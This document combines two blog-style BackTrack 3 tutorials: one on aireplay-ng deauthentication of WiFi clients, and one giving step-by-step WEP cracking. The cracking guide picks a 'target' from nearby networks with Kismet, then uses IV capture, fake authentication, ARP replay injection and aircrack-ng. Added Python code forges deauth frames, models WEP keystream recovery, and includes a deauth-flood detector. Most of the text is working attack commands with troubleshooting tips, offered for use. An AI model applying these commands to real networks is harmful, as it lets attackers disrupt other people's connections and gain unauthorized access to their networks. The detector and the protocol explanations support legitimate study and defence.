
Hacking Wifi in BackTrack 3

by fl3xu5, published on 06-09-2009 11:06 AM. Original author: budhye

BackTrack ships with aircrack for WiFi hacking, and aircrack comes with a set of companion tools including aireplay-ng, airodump-ng, airmon-ng and others. This post explains how to use aireplay-ng.

a. Put the wireless device into monitor mode

airmon-ng <start|stop|check> <interface>

Explanation:
airmon-ng : switches the wireless device into monitor mode (a separate monitor interface is created; capture and injection happen on it)
start, stop, check : enable monitor mode, disable it, or check which mode the wireless device is in
interface : the wireless device

Example:
airmon-ng start wlan0

Result:
Interface Chipset Driver
wlan0 Unknown iwlagn - [phy0]
(monitor mode enabled on mon0)

b. Kicking all clients off

aireplay-ng --deauth [count] -c FF:FF:FF:FF:FF:FF -a [AP MAC] wifi_device

Explanation:
--deauth : sends deauthentication frames, which tell stations that their authentication with the AP is over
count : the number of deauthentication bursts to send, not a duration; 0 keeps sending until you stop it. Once the last burst has gone out, clients can authenticate again and all of them come back.
-c FF:FF:FF:FF:FF:FF : the broadcast address, so every client is hit (leaving -c out has the same effect)
-a [AP MAC] : the BSSID (MAC address) of the access point
wifi_device : the monitor interface created in step a (mon0 here), not the original wlan0

Example:
aireplay-ng --deauth 10 -c FF:FF:FF:FF:FF:FF -a AA:BB:CC:DD:EE:FF mon0

c. Kicking one client off

aireplay-ng --deauth [count] -c [client MAC] -a [AP MAC] wifi_device

Explanation:
--deauth : sends deauthentication frames to the chosen station
count : the number of deauthentication bursts to send; once they have been sent the client can authenticate again
-c [client MAC] : the MAC address of the single client to disconnect
-a [AP MAC] : the BSSID of the access point

Example:
aireplay-ng --deauth 10 -c [client MAC] -a AA:BB:CC:DD:EE:FF mon0

Sometimes the aireplay-ng command above fails because the AP is on a different channel from your wireless device: the deauthentication frames only reach the client when your card transmits on the AP's channel. Rather than retrying until the channels happen to match, put the monitor interface on the AP's channel first (for example airmon-ng start wlan0 <channel>) and run the command again.
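What the --deauth command above actually puts on the air, and how a defender spots it, as an added Python example (this is not code from the post or from the aircrack-ng project). The frame layout is the standard IEEE 802.11 management-frame header followed by a reason code; the MAC addresses, timestamps, the duration value, the reason code chosen for the "legitimate" frame and the whole sample capture are constructed for the demonstration.

```python
"""802.11 deauthentication frames: what aireplay-ng --deauth transmits, and how
to spot a deauth flood in a capture. Added example, not from the original post.

A deauthentication frame is a management frame (type 0, subtype 12) with the
standard 24-byte header (Frame Control, Duration, Addr1 = receiver, Addr2 =
transmitter, Addr3 = BSSID, Sequence Control) followed by a 2-byte reason code.
Multi-byte fields are little-endian. MAC addresses, timestamps and the sample
capture below are constructed for the demonstration.
"""
import struct
from collections import defaultdict

MGMT_TYPE = 0
DEAUTH_SUBTYPE = 0x0C
BROADCAST = "ff:ff:ff:ff:ff:ff"
REASON_CLASS3_FROM_NONASSOC = 7   # reason code aireplay-ng uses in its deauth frames


def mac_bytes(text: str) -> bytes:
    return bytes.fromhex(text.replace(":", ""))


def mac_text(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def build_deauth(receiver: str, transmitter: str, bssid: str, seq: int,
                 reason: int = REASON_CLASS3_FROM_NONASSOC) -> bytes:
    """Forge one deauth frame. Spoofing transmitter=AP towards receiver=client
    (or the broadcast address) is what aireplay-ng -a AP -c CLIENT sends."""
    frame_control = (MGMT_TYPE << 2) | (DEAUTH_SUBTYPE << 4)   # 0x00C0: version 0, type 0, subtype 12
    header = struct.pack("<HH6s6s6sH", frame_control, 0x013A,  # duration value is arbitrary here
                         mac_bytes(receiver), mac_bytes(transmitter), mac_bytes(bssid), seq << 4)
    return header + struct.pack("<H", reason)


def parse_frame(raw: bytes):
    """Decode the common 802.11 header; add the reason code when the frame is a deauth."""
    if len(raw) < 24:
        return None
    fc, _duration, a1, a2, a3, sc = struct.unpack_from("<HH6s6s6sH", raw, 0)
    info = {
        "type": (fc >> 2) & 0x3,
        "subtype": (fc >> 4) & 0xF,
        "receiver": mac_text(a1),
        "transmitter": mac_text(a2),
        "bssid": mac_text(a3),
        "seq": sc >> 4,
    }
    if info["type"] == MGMT_TYPE and info["subtype"] == DEAUTH_SUBTYPE and len(raw) >= 26:
        info["reason"] = struct.unpack_from("<H", raw, 24)[0]
    return info


def detect_deauth_flood(capture, window: float = 1.0, threshold: int = 5):
    """capture: iterable of (timestamp_seconds, raw_frame). Returns one alert per
    BSSID that saw `threshold` or more deauth frames inside any `window`-second
    span. One deauth is normal (a client leaving); a burst, especially to the
    broadcast address, is what a deauth tool produces."""
    per_bssid = defaultdict(list)
    for ts, raw in sorted(capture, key=lambda e: e[0]):
        p = parse_frame(raw)
        if p and "reason" in p:
            per_bssid[p["bssid"]].append((ts, p))
    alerts = []
    for bssid, events in per_bssid.items():
        peak, start = 0, 0
        for end in range(len(events)):             # sliding window over sorted timestamps
            while events[end][0] - events[start][0] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            alerts.append({
                "bssid": bssid,
                "peak_in_window": peak,
                "broadcast": any(p["receiver"] == BROADCAST for _, p in events),
                "reasons": sorted({p["reason"] for _, p in events}),
            })
    return alerts


# Constructed capture: one legitimate deauth, one beacon, then a burst like `--deauth 10`.
AP, CLIENT = "aa:bb:cc:dd:ee:ff", "11:22:33:44:55:66"
SAMPLE_CAPTURE = [
    (0.0, build_deauth(CLIENT, AP, AP, seq=10, reason=3)),          # AP tells one client to leave
    (0.5, struct.pack("<HH6s6s6sH", 0x0080, 0, mac_bytes(BROADCAST),  # beacon: must be ignored
                      mac_bytes(AP), mac_bytes(AP), 11 << 4) + bytes(12)),
]
SAMPLE_CAPTURE += [(5.0 + 0.1 * i, build_deauth(BROADCAST, AP, AP, seq=100 + i))
                   for i in range(10)]                               # spoofed broadcast burst

if __name__ == "__main__":
    for alert in detect_deauth_flood(SAMPLE_CAPTURE):
        print(alert)
```

The single deauthentication from the AP to one client at the start of the capture does not trip the detector; the ten spoofed frames to the broadcast address within one second do, which is the pattern a `--deauth 10 -c FF:FF:FF:FF:FF:FF` run leaves behind. Networks that enforce 802.11w (Protected Management Frames) authenticate deauthentication frames, so spoofed ones like these are dropped there.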

I'mASuper.com

Cracking WEP with BackTrack 3: Step by Step instructions

October 6, 2008

This tutorial will show you, in explanatory detail, how to break or crack WEP encryption using a simple Linux-based security suite titled BackTrack 3. You don't even need Linux installed: a free, downloadable CD ISO image will do all the work for you. The steps outlined here have been tested for clarity in a controlled, legal home networking environment, and work great.

What you need:
1. A computer (laptop) with a CD-ROM drive and a wireless adapter (preferably not USB)
2. The ability to burn ISO images to CD or DVD
3. A copy of the BackTrack 3 Security Suite from Remote-exploit.org

Brief Background: BackTrack 3 is a legal and mostly open-source security suite designed by security experts in the computer and software industry. It is intended both as an educational tool and as a toolbox for network administrators who wish to secure a private or corporate network, or to test a secured one. When searching for it, you'll often see it titled BackTrack3 or Backtrack 3; 3 is the version number and will change with time. As I'm sure you're now well aware, WEP is a first-generation wireless encryption technology that was used to provide basic security to users of 802.11 wireless on their portable computers or devices. It encrypts each frame with RC4 under a shared 40- or 104-bit key combined with a 24-bit per-frame initialization vector (IV) that is sent in the clear, a design that was soon found to be extremely vulnerable to attack, and it has since been replaced by the much more robust WPA technologies.

Common shortcut terminology (important): Throughout this post I'll be referring to IDs, names and addresses unique to your configuration. Look for these in italics and replace them with the values you've collected throughout the tutorial. Although I will always show the # in front of the values, never include it in the actual command.

#SSID - Target SSID (ex: linksys)
#BSSID - Target BSSID (ex: 2D:3F:33:45:56:53)
#Channel - Target channel (ex: 8)
#adapter - Your adapter (ex: ath0 or eth1)

Step 1 Get BT3 and Burn the Image: Download BackTrack 3 from Remote-exploit.org. You'll need the bt3-final.iso image. You can also use the USB version, bt3final_usb.iso, which includes some extra tools, but we won't be using them here. Burn the ISO image to a CD or DVD; you won't need to make any changes. I won't go into the specifics of how to burn an ISO here. If you don't have the vaguest idea how to do this, then it's highly likely that cracking WEP is not for you. For those of you who think you can figure it out on your own, I have used CDBurnerXP; it's open-source and simple to use, so that's good. Alternatively, you can image a thumb drive with the ISO, which will be MUCH faster than the optical drive.

Step 2 Boot BackTrack 3: Put the BackTrack 3 disc into your laptop or desktop (I haven't tested this on a desktop, but I'm sure the steps are the same), set your BIOS to boot from your optical drive, and boot. You'll get a prompt asking how to boot into BackTrack 3. Boot using the KDE method; if you have odd display issues, try the VESA boot method. One of these should work. Once you've become an elite hackmaster and have memorized this process, you can use the command-line console instead.

Step 3 Obtain your target: Now is where we get to the fun part. We need to know which router, or access point, we intend to attack. First we're going to use Kismet, an 802.11 network detector. It shows detailed information about all the wireless networks and devices being picked up by your wireless adapter. To use Kismet, head to your KDE menu (where a Windows Start menu would be), then navigate to: Backtrack 3 > Radio Network Analysis > 80211 > Analyser > Kismet. Wireless networks will begin to appear in Kismet as it gathers and analyzes radio packets. These are all the wireless networks in your neighborhood or general area, and you can see there is a wealth of information here. From this point we'll need to use the keyboard, so put down your mouse. We need to sort our data, so while in the Kismet window, hit the s key and then w for WEP. This sorts all of the wireless networks by their WEP encryption; you'll see everything reordered via the w column. Once you've determined your target, use your keyboard arrow keys to navigate to it and hit Enter. You'll need some of the information on the new screen. You can write it down, or you can use KEdit by going to IDE > Editors > Kedit. This works like Windows Notepad, so you can cut and paste at your leisure. You'll need the following information:

SSID
BSSID
Channel

The SSID is the friendly wireless network name you see all the time; the BSSID is the MAC address, or unique hardware address, of the AP or router. Exit Kismet with Ctrl-Q (note the capital Q).

Step 4 Get the system ready to record: Now the fun part. We need to get your computer ready to record all the radio packets you want to capture, so you can analyze them later. Down by the KDE start menu you'll see a little black monitor icon which brings up a command console. We'll be using these a lot, so remember where it is.

Launch a new command window and enter the following:

airmon-ng

This lists the wireless adapters and any monitor interfaces that are running. Stop everything that is running:

airmon-ng stop #adapter

Repeat the above command for every adapter listed by airmon-ng. Now we have no running adapters or virtual adapters; essentially, anything Kismet started in order to capture radio packets has been turned off. On some laptops the above steps were absolutely essential, on other laptops not so much. Next, start your adapter in monitor mode, locked to the channel your target AP broadcasts on (we got this information in step 3):

airmon-ng start #adapter #channel

Run airmon-ng one more time to see what your new monitor interface is named (depending on the driver it may be ath0, mon0 or similar rather than the original name). That is the #adapter you use from here on.

Step 5 Recording packets: We're going to be gathering radio packets from your target router (AP), but we haven't started recording them yet. Obviously, if we don't record we won't be able to analyze them, so let's start recording now:

airodump-ng --channel #channel --ivs -w /hackme #adapter

We've now begun recording the WEP traffic on your channel, writing it to files named hackme-01.* in the Linux root, /. For those of you who are curious: --ivs tells airodump-ng to save only the initialization vectors (IVs) rather than whole frames. Every WEP frame carries a 3-byte IV in the clear, and the frame's RC4 keystream is derived from that IV plus the shared key; collecting a large number of distinct IVs, along with the first encrypted bytes that follow each one, is what aircrack-ng uses to recover the key, so the IVs are the heart of WEP exploitation. Leave this recording running in this console window; it will remain open for the remainder of this insane adventure.

Step 6 AP association: Now that we're recording data, we need to do a kind of handshake with your target WEP router. When a station and an AP start talking, they begin with an open-system authentication and an association exchange, which happens before any WEP key is ever used and needs no knowledge of the key. If you try to inject packets (step 7) without this, the AP will simply discard your frames, because it only relays data frames from associated stations; like most people, there's no sense in talking to some jerk who won't even say hello.

To associate your laptop with the access point, run the following command (this is aireplay-ng's fake authentication attack):

aireplay-ng -1 0 -e #ssid -a #bssid #adapter

This is absolutely critical. The output should show a couple of authentication requests and then "Association successful". If it does not, you're not going to be able to do packet injection (step 7). If you don't get a friendly return, you can check whether your card can inject at all:

aireplay-ng --test #adapter

If the injection test says injection is working but association still fails, try another AP. You can also try getting physically closer to your target: association and injection are difficult at a distance, and may not work at all. I won't go into deep troubleshooting of association at this point. If for some terrible reason your computer is not capable of association, don't fret; you just won't be able to do packet injection, which means collecting packets will take MUCH longer. Skip steps 7 and 8 if you can't associate, but be advised it will likely take you hours if not days to collect enough packets to crack WEP. That's why injection is so useful. Once you've associated successfully, continue to the next step!

Step 7 Packet Injection: In step 6 we said hello to the AP. The target AP is now aware of us: we are an associated station, so it will relay data frames we send it. This is where a major exploit becomes possible. WEP has no replay protection, and every frame the AP relays is re-encrypted with a fresh IV. With every new IV we capture we get closer to cracking WEP, and the fastest way to get hundreds of thousands of them is to make the AP generate traffic for us. That process is packet injection: aireplay-ng listens for an ARP request (a short frame of recognizable size that a real client sends, for example when it joins the network), then retransmits that same encrypted frame to the AP thousands of times. The AP cannot tell a replay from the original, so it relays each copy under a new IV, and each of those relayed frames goes straight into our capture. Note that the AP never sees a WEP key from us and never rejects anything; we are simply making it encrypt the same packet over and over. To begin injection, do this (you can reuse the window created in step 6 if authentication was successful):

aireplay-ng -3 -b #bssid #adapter

This replays captured ARP requests continuously. The process doesn't end: it keeps sending until you stop it with Ctrl-C or close the window, and there is no reason to stop it until we've recovered the WEP key. You'll see the IV count in the airodump-ng window going higher and higher, likely incredibly quickly, meaning hundreds every few minutes, or hundreds per second with a good card. After you've collected between 300,000 (300k) and 500,000 (500k) IVs you can move on to the next step; that figure is for the older FMS/KoreK attacks, and the PTW attack in aircrack-ng 1.0 and later usually succeeds with well under 100,000, so it does no harm to try step 8 earlier. If no new IVs are arriving, open a new command console and rerun step 6 while step 7 is still running in another window: the association may have timed out, and an AP drops injected frames from a station that is no longer associated. If injection isn't finding an ARP request to replay, you need a real client to send one; a client joining (or rejoining, after a deauthentication) the network usually does. If you can't collect IVs, you'll never get a WEP key. If your IV count isn't going up, your whole process is hosed; figure out where the kink is and try again.

Step 8 Breaking the WEP key: Okay, you've made it! You've collected at least 300k IVs. If you haven't, but you have at least 100, you can try this step anyway; it'll be fun. Now that we have all this recorded IV information, we can crack the WEP key in a matter of moments. Run this command:

aircrack-ng -s /hackme-01.ivs

Now select the number that corresponds to your target access point, or SSID. The screen will flash with a bunch of crazy, matrix-looking numbers, and in 5 seconds or less it will give you your broken WEP key (the -s flag also shows it as ASCII where it is printable). If it doesn't return a WEP key practically immediately, just exit (Ctrl-C) and wait a few more minutes. Eventually you'll have enough IVs to break the WEP key in literally just a few seconds. Congratulations! You're done!

I was one of the poor saps who couldn't associate or do packet injection. Do I still have a chance? Yes! IVs are the whole key to successfully using aircrack-ng to break a WEP key. If your attempts at packet injection have failed, or you can't associate (which makes injection fail by definition), then obviously it becomes much harder to crack WEP, but you can still do it. Just record (step 5) IVs until you've built up enough by watching OTHER computers talking to the AP. The more legitimate devices using the AP, the better chance you have of getting enough IV data without waiting a lifetime. If your AP has 2 or 3 laptops connecting to it every few hours, you can leave your computer capturing IVs for a couple of days and still break the WEP key using step 8.

Why can't I crack WEP in Windows? I've looked everywhere, and there just isn't a tutorial! You can thank most Windows hardware vendors for that. The ability to capture IVs comes from a wireless card's ability to enter monitor mode, also called rfmon mode. This is different from ordinary promiscuous mode: promiscuous mode only shows you traffic on a network you have already joined, while monitor mode lets the card capture every raw 802.11 frame on the channel, headers and all, without being associated to anything. Unfortunately, most Windows drivers, with the exception of a few custom hardware solutions (AirPcap), don't allow you to put your wireless card into this mode. It's not necessarily intentional. The likely explanation is that they simply didn't realize Windows users would want this functionality; heaven forbid someone desire to use Windows hardware for something other than what it was intended for. So the Linux community, as in many situations, simply wrote custom drivers for the hardware that can put it into monitor mode. No one has yet done this for Windows. There are some, very limited, wireless cards out there that will go into rfmon mode without much effort, but my friend, I have to tell you, you probably don't have one of those cards. So for now, just continue to boot off of BackTrack 3 and have it do all the work for you!
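Why steps 5 through 8 revolve around collecting IVs, and why the ARP replay of step 7 produces them so fast, as an added Python example (not code from the post or from the aircrack-ng project, and not the statistical attack aircrack-ng itself runs): a working model of WEP's RC4 encryption with its CRC-32 ICV, a keystream recovered from a frame whose plaintext is known, a toy access point that relays replayed frames under fresh IVs, and a count of how quickly randomly chosen 24-bit IVs repeat. The key, IVs, MAC addresses, ARP contents and the WepAccessPoint class are all constructed for the demonstration.

```python
"""Why collecting IVs breaks WEP: an added example, not code from the original post.

WEP encrypts every frame with RC4 keyed by (IV || shared key), where the 3-byte
IV travels in the clear in front of the ciphertext. Once the key is fixed, the
keystream for a frame is a function of the IV alone, which gives the two
effects the tutorial relies on:
  * a frame whose plaintext is known (an ARP request always starts with the same
    LLC/SNAP and ARP bytes) reveals the keystream for its IV, and any other
    frame that reuses that IV can be decrypted with it;
  * an AP that relays a replayed ARP request re-encrypts it under a fresh IV,
    which is the behaviour aireplay-ng -3 exploits to harvest IVs quickly.
The key, IVs, ARP contents and payloads below are constructed for the demo.
"""
import random
import zlib


def rc4(key: bytes, length: int) -> bytes:
    """RC4 keystream of `length` bytes (key scheduling followed by output generation)."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """IV || RC4_{IV||key}(plaintext || CRC-32 ICV). The key-ID byte is omitted."""
    body = plaintext + zlib.crc32(plaintext).to_bytes(4, "little")
    keystream = rc4(iv + key, len(body))
    return iv + bytes(a ^ b for a, b in zip(body, keystream))


def wep_decrypt(key: bytes, frame: bytes) -> bytes:
    """Decrypt and verify the ICV; raises ValueError on a corrupted frame."""
    iv, body = frame[:3], frame[3:]
    plain = bytes(a ^ b for a, b in zip(body, rc4(iv + key, len(body))))
    data, icv = plain[:-4], plain[-4:]
    if zlib.crc32(data).to_bytes(4, "little") != icv:
        raise ValueError("bad ICV")
    return data


# Every ARP request inside a WEP data frame starts with this LLC/SNAP header (known plaintext).
SNAP_ARP = bytes.fromhex("aaaa030000000806")
KEY = bytes.fromhex("0102030405")                       # constructed 40-bit key
ARP_REQUEST = SNAP_ARP + bytes.fromhex(                  # constructed "who-has 192.168.1.1"
    "0001080006040001" "001122334455" "c0a80164" "000000000000" "c0a80101")


def recover_keystream(frame: bytes, known_plaintext: bytes) -> bytes:
    """Keystream prefix for this frame's IV: ciphertext XOR known plaintext. No key needed."""
    return bytes(c ^ p for c, p in zip(frame[3:], known_plaintext))


def decrypt_with_keystream(frame: bytes, keystream: bytes) -> bytes:
    """Decrypt (a prefix of) any frame that reused the IV the keystream belongs to."""
    return bytes(c ^ k for c, k in zip(frame[3:], keystream))


class WepAccessPoint:
    """Toy AP: relays any frame with a valid ICV, re-encrypting it under its own next IV.
    WEP has no replay protection, so a replayed ARP request is relayed again and again."""

    def __init__(self, key: bytes):
        self.key = key
        self.iv_counter = 0

    def relay(self, frame: bytes) -> bytes:
        data = wep_decrypt(self.key, frame)              # a bad ICV would be dropped here
        self.iv_counter = (self.iv_counter + 1) % (1 << 24)
        return wep_encrypt(self.key, self.iv_counter.to_bytes(3, "big"), data)


def arp_replay(ap: WepAccessPoint, captured_arp: bytes, count: int) -> set:
    """Replay one captured ARP frame `count` times; return the distinct IVs the AP emits."""
    return {ap.relay(captured_arp)[:3] for _ in range(count)}


def first_iv_collision(n_frames: int, seed: int = 1):
    """Index of the first repeated IV when a station picks 24-bit IVs at random (None if none)."""
    rng = random.Random(seed)
    seen = set()
    for n in range(n_frames):
        iv = rng.getrandbits(24)
        if iv in seen:
            return n
        seen.add(iv)
    return None


if __name__ == "__main__":
    iv = b"\x00\x00\x01"
    arp_frame = wep_encrypt(KEY, iv, ARP_REQUEST)
    ks = recover_keystream(arp_frame, ARP_REQUEST)               # attacker never used KEY
    other = wep_encrypt(KEY, iv, b"GET /admin HTTP/1.0\r\n")     # some other frame, same IV
    print("recovered from IV reuse:", decrypt_with_keystream(other, ks)[:21])
    print("IVs harvested by replaying one ARP:", len(arp_replay(WepAccessPoint(KEY), arp_frame, 1000)))
    print("first IV collision after", first_iv_collision(100_000), "random-IV frames")
```

Running it shows the keystream taken from the ARP frame decrypting an unrelated frame that reused IV 00:00:01, 1,000 distinct IVs produced by replaying a single captured frame (what the rising IV count in step 7 looks like), and a randomly-chosen-IV station repeating an IV after a few thousand frames, long before its 16.7 million possible values are exhausted. Recovering the key itself from the harvested IVs is aircrack-ng's job in step 8 and is not modelled here.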
